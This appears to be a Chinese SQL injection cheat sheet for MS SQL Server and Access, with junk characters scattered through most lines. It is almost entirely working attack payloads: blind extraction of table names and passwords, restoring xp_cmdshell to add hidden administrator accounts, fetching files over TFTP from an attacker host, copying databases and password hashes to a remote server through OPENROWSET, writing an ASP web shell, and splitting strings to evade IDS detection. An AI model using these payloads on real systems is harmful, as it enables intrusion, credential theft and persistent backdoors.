SQL注入语句2

admin

1..判断有无注入点
; and 1=1 and 1=2
8 M4 I$ ]8 d) r
. ~' W  s$ Q% h1 I! {# V' j: L6 y
) z* T: A' p! J7 U2.猜表一般的表的名称无非是admin adminuser user pass password 等..
and 0<>(select count(*) from *)
3 G' ?2 Z$ _3 M( a" j# M) L% gand 0<>(select count(*) from admin) ---判断是否存在admin这张表
; k* \; q) W$ K' P9 n5 x/ R
6 X# ?" p/ v& Y. Z
$ H; W8 B! l7 L" |& k) X, Q3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
猜列名还有 and (select count(列名) from 表名)>0
/ ^6 O2 h$ Z2 ~: x9 `6 w9 z

. _% Z% J- [& e" D; i4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.
8 e4 a0 i( X5 i+ P+ z, x* pand 1=(select count(*) from admin where len(*)>0)--
4 `7 k1 X1 i# s$ ]* l# _and 1=(select count(*) from admin where len(用户字段名称name)>0)
and 1=(select count(*) from admin where len(密码字段名称password)>0)
, H: x8 F* _: f, V
  ~+ d. Q; X. i5 m  ?7 ~5.猜解各个字段的长度 猜解长度就是把>0变换 直到返回正确页面为止
: [4 ~1 l+ s* s2 y- _: b" Eand 1=(select count(*) from admin where len(*)>0)
and 1=(select count(*) from admin where len(name)>6) 错误
and 1=(select count(*) from admin where len(name)>5) 正确 长度是6
" x" ~" i6 Y/ o/ pand 1=(select count(*) from admin where len(name)=6) 正确

and 1=(select count(*) from admin where len(password)>11) 正确
' x; O5 L. u  ^; |5 k2 zand 1=(select count(*) from admin where len(password)>12) 错误 长度是12
% S! q0 t' Q0 \# q$ j5 Band 1=(select count(*) from admin where len(password)=12) 正确
1 L$ a% Q3 A. K& _猜长度还有 and (select top 1 len(username) from admin)>5


6.猜解字符
/ @1 u1 J7 K8 D& \5 K$ Oand 1=(select count(*) from admin where left(name,1)=a) ---猜解用户帐号的第一位
and 1=(select count(*) from admin where left(name,2)=ab)---猜解用户帐号的第二位
3 ^8 k1 t8 R2 ^: Z& y' O+ ]就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了

猜内容还有  and (select top 1 asc(mid(password,1,1)) from admin)>50  用ASC码算
; I; x3 ?6 l2 \( ~0 ]8 Fand 1=(select top 1 count(*) from Admin where Asc(mid(pass,5,1))=51) --
这个查询语句可以猜解中文的用户和密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.

5 Y% w( J% @& {1 |group by users.id having 1=1--
group by users.id, users.username, users.password, users.privs having 1=1--
7 h8 J8 n  g) [8 k; insert into users values( 666, attacker, foobar, 0xffff )--

UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable-
, `' M* n! A3 \, z, H/ n' V/ NUNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id)-
UNION SELECT TOP 1 列名 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=logintable WHERE 列名 NOT IN (login_id,login_name)-
0 C( x' E- Y& L+ i' lUNION SELECT TOP 1 login_name FROM logintable-
UNION SELECT TOP 1 password FROM logintable where login_name=Rahul--
2 `/ s3 x! k4 P; d& `6 r' m  V% J
看服务器打的补丁=出错了打了SP4补丁
1 w3 H# {' m# j4 [  uand 1=(select @@VERSION)--
9 b8 D$ |+ X2 }( s5 @
看数据库连接账号的权限，返回正常，证明是服务器角色sysadmin权限。
9 L9 e# I, V: c4 V3 R, eand 1=(SELECT IS_SRVROLEMEMBER(sysadmin))--
5 H$ m6 T( \2 }" j( R$ F2 i7 V$ v+ \' q
, h3 l1 J% [1 K% ^判断连接数据库帐号。（采用SA账号连接 返回正常=证明了连接账号是SA）
and sa=(SELECT System_user)--
and user_name()=dbo--
! E0 g3 t  B0 W1 }3 Sand 0<>(select user_name()--

看xp_cmdshell是否删除
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = X AND name = xp_cmdshell)--
3 ]" o& E) ^7 ~7 J) G8 V& d
xp_cmdshell被删除，恢复,支持绝对路径的恢复
  p5 @# Z' g) d" J% Q/ o* L8 B;EXEC master.dbo.sp_addextendedproc xp_cmdshell,xplog70.dll--
" J' U8 g! I0 n9 b;EXEC master.dbo.sp_addextendedproc xp_cmdshell,c:\inetpub\wwwroot\xplog70.dll--

反向PING自己实验
;use master;declare @s int;exec sp_oacreate "wscript.shell",@s out;exec sp_oamethod @s,"run",NULL,"cmd.exe /c ping 192.168.0.1";--

加帐号
;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C:\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add--
$ M2 r) e; N; m* k/ X; k; {! w
创建一个虚拟目录E盘：
;declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c：\inetpub\wwwroot\mkwebdir.vbs -w "默认Web站点" -v "e","e：\"--
, }# x& `1 n! D
8 j5 i5 n. t' m) |访问属性：（配合写入一个webshell）
+ j- P; |* [! w7 l6 ydeclare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, cscript.exe c：\inetpub\wwwroot\chaccess.vbs -a w3svc/1/ROOT/e +browse
# S( @4 G" A& B: ^2 x5 a1 c# S

MSSQL也可以用联合查询
, V9 t+ Y) J3 x/ k, `4 Q& o4 E?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union，access也好用)
" W! W$ L* c& h3 D- w

: R) ^+ E4 I/ N* T3 R% e爆库 特殊技巧:%5c=\ 或者把/和\ 修改%5提交
% C0 l" n$ x0 I+ R; K( g
/ C& m1 x* v0 q) {6 K2 \
1 O+ E3 ^% t8 N* V
0 b% r3 P* s% c* o2 D$ s得到WEB路径
;create table [dbo].[swap] ([swappass][char](255));--
. p5 d" Q$ T, J# }9 `and (select top 1 swappass from swap)=1--
4 {; z! ~$ {$ D5 W;CREATE TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\, @value_name=/, values=@test OUTPUT insert into paths(path) values(@test)--
/ K0 ?+ b8 i' e9 g7 C- t;use ku1;--
;create table cmd (str image);-- 建立image类型的表cmd

存在xp_cmdshell的测试过程：
;exec master..xp_cmdshell dir
;exec master.dbo.sp_addlogin jiaoniang$;-- 加SQL帐号
;exec master.dbo.sp_password null,jiaoniang$,1866574;--
, g* h  ^% f0 \3 g0 `;exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin;--
;exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add;--
;exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add;--
6 g2 Y6 f  l" o2 m8 j; R+ K( f' dexec master..xp_servicecontrol start, schedule 启动服务
exec master..xp_servicecontrol start, server
. n1 o" Q+ }5 N: u; W2 v/ }; DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C：\WINNT\system32\cmd.exe /c net user jiaoniang$ 1866574 /add
  k; y  A7 U' S/ c4 a7 O;DECLARE @shell INT EXEC SP_OACREATE wscript.shell,@shell OUTPUT EXEC SP_OAMETHOD @shell,run,null, C：\WINNT\system32\cmd.exe /c net localgroup administrators jiaoniang$ /add
; exec master..xp_cmdshell tftp -i youip get file.exe-- 利用TFTP上传文件
# v3 M- v7 K0 |+ ?
- g8 Q4 V0 H2 P5 z% @* }/ w& v;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
, V0 H- ~& u( ^+ `. Q;declare @a;set @a=db_name();backup database @a to disk=你的IP你的共享目录bak.dat
如果被限制则可以。
select * from openrowset(sqloledb,server;sa;,select OK! exec master.dbo.sp_addlogin hax)

查询构造：
SELECT * FROM news WHERE id=... AND topic=... AND .....
7 u0 x: I' o+ Gadminand 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass <>
select 123;--
- c6 Y3 I2 M' M/ x8 K5 K/ e;use master;--
! s+ N! q& j: z/ k:a or name like fff%;-- 显示有一个叫ffff的用户哈。
and 1<>(select count(email) from [user]);--
9 ]! [; w9 X& L) H, {;update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=ffff;--
;update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=ffff;--
;update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=ffff;--
;update [users] set email=(select top 1 count(id) from password) where name=ffff;--
;update [users] set email=(select top 1 pwd from password where id=2) where name=ffff;--
9 J" \8 n; G2 e5 V: };update [users] set email=(select top 1 name from password where id=2) where name=ffff;--
2 z' S' [3 T( B( U& x上面的语句是得到数据库中的第一个用户表,并把表名放在ffff用户的邮箱字段中。
通过查看ffff的用户资料可得第一个用表叫ad
然后根据表名ad得到这个表的ID 得到第二个表的名字
6 r. Z6 A0 D+ X4 K$ ^
insert into users values( 666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)--
* Q1 \- y2 ^) R, U$ uinsert into users values( 667,123,123,0xffff)--
4 f6 s8 n3 n  s2 L4 g8 Z) X) Pinsert into users values ( 123, admin--, password, 0xffff)--
;and user>0
;and (select count(*) from sysobjects)>0
;and (select count(*) from mysysobjects)>0 //为access数据库

枚举出数据表名
% c) ]/ e' g; k+ }6 s;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0);--
; G1 B7 _; S# ?) F这是将第一个表名更新到aaa的字段处。
读出第一个表，第二个表可以这样读出来（在条件后加上 and name<>刚才得到的表名）。
8 s2 z, r! Y; H2 u9 {. S$ ]7 u;update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote);--
然后id=1552 and exists(select * from aaa where aaa>5)
读出第二个表，一个个的读出，直到没有为止。
读字段是这样：
7 N% \/ l* u: w, [( ^;update aaa set aaa=(select top 1 col_name(object_id(表名),1));--
然后id=152 and exists(select * from aaa where aaa>5)出错，得到字段名
;update aaa set aaa=(select top 1 col_name(object_id(表名),2));--
然后id=152 and exists(select * from aaa where aaa>5)出错，得到字段名
6 E  O' Z% F. s, Z9 U0 ~
% `7 e- D* S2 ^( \# {& r2 u[获得数据表名][将字段值更新为表名，再想法读出这个字段的值就可得到表名]
update 表名 set 字段=(select top 1 name from sysobjects where xtype=u and status>0 [ and name<>你得到的表名 查出一个加一个]) [ where 条件] select top 1 name from sysobjects where xtype=u and status>0 and name not in(table1,table2,…)
通过SQLSERVER注入漏洞建数据库管理员帐号和系统管理员帐号[当前帐号必须是SYSADMIN组]

( ]2 A1 c' t# `6 t[获得数据表字段名][将字段值更新为字段名，再想法读出这个字段的值就可得到字段名]
8 z1 f! E+ h" C* [, t" j0 e( E; Xupdate 表名 set 字段=(select top 1 col_name(object_id(要查询的数据表名),字段列如:1) [ where 条件]

绕过IDS的检测[使用变量]
6 D! r* Y# S% y' R- Z7 n) ?;declare @a sysname set @a=xp_+cmdshell exec @a dir c:\
;declare @a sysname set @a=xp+_cm’+’dshell exec @a dir c:\
* ?3 J. Q! a5 q: B6 h
0 }1 ]4 I% r& D' I  t) n5 A1、 开启远程数据库
; T5 P7 [; ]1 l1 [/ f0 W基本语法
  M  Q" w" J% J+ Y  i# A5 G# oselect * from OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1 )
参数: (1) OLEDB Provider name
2、 其中连接字符串参数可以是任何端口用来连接,比如
1 w# T: }! [# I% v' l9 z; B/ Jselect * from OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;, select * from table
4 }1 u6 A" i6 F2 o4 h% \  A: a3.复制目标主机的整个数据库insert所有远程表到本地表。

基本语法：
insert into OPENROWSET(SQLOLEDB, server=servername;uid=sa;pwd=123, select * from table1) select * from table2
6 n( b  w5 E. ]1 P; D这行语句将目标主机上table2表中的所有数据复制到远程数据库中的table1表中。实际运用中适当修改连接字符串的IP地址和端口，指向需要的地方，比如：
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from table2
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysdatabases)
& e4 v3 p. `, c" g- Oselect * from master.dbo.sysdatabases
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysobjects)
3 g! p' n4 l* I1 Z9 E2 g, `select * from user_database.dbo.sysobjects
% \% Q/ n0 |/ a! Jinsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _syscolumns)
select * from user_database.dbo.syscolumns
复制数据库：
insert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table1) select * from database..table1
! H; u5 K5 ]4 E) r: Ninsert into OPENROWSET(SQLOLEDB,uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from table2) select * from database..table2

复制哈西表（HASH）登录密码的hash存储于sysxlogins中。方法如下：
insert into OPENROWSET(SQLOLEDB, uid=sa;pwd=123;Network=DBMSSOCN;Address=192.168.0.1,1433;,select * from _sysxlogins) select * from database.dbo.sysxlogins
* T7 a) K9 H# j5 `得到hash之后，就可以进行暴力破解。

, n! z( |: r; f遍历目录的方法： 先创建一个临时表：temp
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
1 Y3 o+ r7 B8 w+ h% D;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 获得子目录列表
( E& a* h- V0 w. w+ @5 y- \;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 获得所有子目录的目录树结构,并寸入temp表中
;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查看某个文件的内容
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\;--
;insert into temp(id) exec master.dbo.xp_cmdshell dir c:\ *.asp /s/a;--
  U; y2 X* t! V* A/ c, i;insert into temp(id) exec master.dbo.xp_cmdshell cscript C:\Inetpub\AdminScripts\adsutil.vbs enum w3svc
, l4 [) c6 e7 Z5 U$ D# d( K;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- （xp_dirtree适用权限PUBLIC）
写入表：
语句1：and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
' d' E# t: p6 O$ T, w2 a语句2：and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
4 s3 D( C$ W8 A8 [" y2 q( I# l语句3：and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
语句4：and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
8 f" s& W) a2 I9 ?语句5：and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
语句6：and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--
语句7：and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
语句8：and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
, M3 h2 n+ ^( P0 b' v$ X( H语句9：and 1=(SELECT IS_MEMBER(db_owner));--

把路径写到表中去：
;create table dirs(paths varchar(100), id int)--
7 @  o  m0 C1 f6 o" `  e3 {;insert dirs exec master.dbo.xp_dirtree c:\--
and 0<>(select top 1 paths from dirs)--
8 }3 u# l9 M1 j. r" p* s5 j0 Qand 0<>(select top 1 paths from dirs where paths not in(@Inetpub))--
& a0 Y- z' M: O- A7 X;create table dirs1(paths varchar(100), id int)--
0 v& U/ I/ V+ I; h. w) o;insert dirs exec master.dbo.xp_dirtree e:\web--
5 L2 b) k( \! @: G+ o& Sand 0<>(select top 1 paths from dirs1)--
+ H. V' R; L; w$ X% c) |
把数据库备份到网页目录：下载
$ m0 R+ J& w% V( X: E1 D;declare @a sysname; set @a=db_name();backup database @a to disk=e:\web\down.bak;--
6 x& p/ B6 N! H0 \% T* ]8 F
9 z3 j: |2 T, v) J, Y  G2 iand 1=(Select top 1 name from(Select top 12 id,name from sysobjects where xtype=char(85)) T order by id desc)
and 1=(Select Top 1 col_name(object_id(USER_LOGIN),1) from sysobjects) 参看相关表。
6 Z" o. c4 y3 X* wand 1=(select user_id from USER_LOGIN)
and 0=(select user from USER_LOGIN where user>1)
' N8 v' r9 S& H
- v, K+ q& h7 m! w9 n, n* Z-=- wscript.shell example -=-
declare @o int
( x$ B& N3 D. hexec sp_oacreate wscript.shell, @o out
exec sp_oamethod @o, run, NULL, notepad.exe
; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, NULL, notepad.exe--

& |* H+ d9 u8 n; J: I) s/ K  _declare @o int, @f int, @t int, @ret int
5 x: ~- b9 j  Y$ h7 ?/ Ndeclare @line varchar(8000)
" z. G+ P3 `% J# k) n# m, V- nexec sp_oacreate scripting.filesystemobject, @o out
# K9 u0 l/ e! e; R/ `exec sp_oamethod @o, opentextfile, @f out, c:\boot.ini, 1
, N* r$ A; _$ [3 eexec @ret = sp_oamethod @f, readline, @line out
while( @ret = 0 )
4 q2 x3 J* G3 S4 Z1 a  L) ?; r  bbegin
& s2 J5 }7 R5 i* Eprint @line
$ y- t" c" a2 E: Q) ~exec @ret = sp_oamethod @f, readline, @line out
end
8 f+ J  c" e" t' ?) v4 H8 p
, d+ r4 |% W1 V& ^; [5 pdeclare @o int, @f int, @t int, @ret int
exec sp_oacreate scripting.filesystemobject, @o out
4 O) F4 h) W* r5 Y) M* ]7 ~exec sp_oamethod @o, createtextfile, @f out, c:\inetpub\wwwroot\foo.asp, 1
exec @ret = sp_oamethod @f, writeline, NULL,
; a( e% `  g1 ?8 D) X! V: t8 R' d4 Q<% set o = server.createobject("wscript.shell"): o.run( request.querystring("cmd") ) %>

declare @o int, @ret int
exec sp_oacreate speech.voicetext, @o out
exec sp_oamethod @o, register, NULL, foo, bar
! J$ `) {6 z, w0 j" s8 cexec sp_oasetproperty @o, speed, 150
0 x5 h' T( w. s1 r, a1 kexec sp_oamethod @o, speak, NULL, all your sequel servers are belong to,us, 528
2 U& G6 p* I# \* V4 fwaitfor delay 00:00:05
+ w9 r: H# Y3 n; P
& p. f1 w" V; X; g9 i; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, NULL, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, NULL, all your sequel servers are belong to us, 528 waitfor delay 00:00:05--
& X2 O5 ~& f! [  v
4 i" _3 x! ~7 I6 u- Y3 Rxp_dirtree适用权限PUBLIC
exec master.dbo.xp_dirtree c:返回的信息有两个字段subdirectory、depth。Subdirectory字段是字符型，depth字段是整形字段。
$ y1 T; P  H8 `# V& ]create table dirs(paths varchar(100), id int)
建表，这里建的表是和上面xp_dirtree相关连，字段相等、类型相同。
insert dirs exec master.dbo.xp_dirtree c:只要我们建表与存储进程返回的字段相定义相等就能够执行！达到写表的效果,一步步达到我们想要的信息！
% K+ \: ?8 L* s; o